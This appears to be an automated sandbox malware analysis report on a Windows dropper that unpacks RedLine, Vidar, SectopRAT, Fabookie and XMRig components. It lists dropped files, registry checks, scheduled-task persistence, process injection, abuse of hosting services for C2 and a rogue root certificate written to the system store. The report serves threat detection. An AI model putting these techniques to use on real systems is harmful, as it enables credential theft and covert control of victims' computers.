Malware Analysis Report

2025-01-02 06:04

Sample ID 241126-sdd2raslhq
Target a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118
SHA256 6430e35390b94f25e609d8dc2edadd8f6b0b30bec768ce894c67028de438ab13
Tags
fabookie nullmixer redline sectoprat vidar olk aspackv2 discovery dropper infostealer rat spyware stealer trojan upx xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6430e35390b94f25e609d8dc2edadd8f6b0b30bec768ce894c67028de438ab13

Threat Level: Known bad

The file a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

fabookie nullmixer redline sectoprat vidar olk aspackv2 discovery dropper infostealer rat spyware stealer trojan upx xmrig miner

RedLine payload

Fabookie

Fabookie family

SectopRAT payload

xmrig

Xmrig family

Nullmixer family

SectopRAT

Vidar

Redline family

Sectoprat family

RedLine

NullMixer

Vidar family

Detect Fabookie payload

Detected Nirsoft tools

XMRig Miner payload

Vidar Stealer

ASPack v2.12-2.42

Loads dropped DLL

Checks computer location settings

Reads user/profile data of web browsers

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Looks up external IP address via web service

Accesses 2FA software files, possible credential harvesting

UPX packed file

Suspicious use of SetThreadContext

Drops file in Windows directory

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Unsigned PE

Program crash

Scheduled Task/Job: Scheduled Task

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

Checks processor information in registry

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-26 15:00

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-26 15:00

Reported

2024-11-26 15:02

Platform

win7-20241023-en

Max time kernel

58s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Vidar

stealer vidar

Vidar family

vidar

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-5H5CV.tmp\jobiea_5.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Windows\winnetdriv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_1.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-5H5CV.tmp\jobiea_5.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-5H5CV.tmp\jobiea_5.tmp N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_2.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-5H5CV.tmp\jobiea_5.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_4.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_9.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_4.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.db-ip.com N/A N/A
N/A api.db-ip.com N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2952 set thread context of 1664 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.exe C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-5H5CV.tmp\jobiea_5.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_3.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_3.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_3.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_3.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1548 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe
PID 1548 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe
PID 1548 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe
PID 1548 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe
PID 1548 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe
PID 1548 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe
PID 1548 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe
PID 2228 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
